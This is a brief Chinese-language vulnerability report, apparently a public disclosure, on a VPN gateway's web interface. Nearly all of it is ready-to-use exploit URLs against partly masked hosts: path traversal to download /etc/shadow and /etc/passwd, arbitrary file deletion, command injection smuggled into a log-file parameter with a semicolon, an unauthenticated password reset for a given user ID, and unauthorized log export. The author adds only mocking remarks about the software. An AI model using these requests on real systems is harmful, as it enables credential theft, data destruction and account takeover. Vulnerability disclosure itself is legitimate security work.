这程序写的...
下载任意文件
**.**.**.**/debug/rproxy_diag.php?action=download&filename=/etc/shadow
**.**.**.**/debug/rproxy_diag.php?action=tarfile&search=&logfile%5B%5D=../../../etc/passwd
删除任意文件及任意命令执行
任意文件删除:
https://202.***.208/debug/list_logfile.php?logfile%5B%5D=%2FIsc%2FLog%2Fsshd.log&action=delete
命令执行:
https://202.***.208/debug/list_logfile.php?logfile%5B%5D=%2FIsc%2FLog%2Fsshd.log;echo test >/Isc/third-party/httpd/htdocs/t.txt;&action=delete
任意用户密码重置
搞笑有爱啊
https://202.***.208/vpnweb/resetpwd/resetpwd.php?action=update&UserId=2048&password1=test123456
这里也没做啥有用的过滤 所以同样可以注入
还有越权下载日志:
**.**.**.**/admin/export_log.php?type=syslog
**.**.**.**/admin/export_log.php?type=userflow
**.**.**.**/admin/export_log.php?type=userapp
**.**.**.**/admin/export_log.php?type=userlogin
**.**.**.**/admin/export_log.php?type=url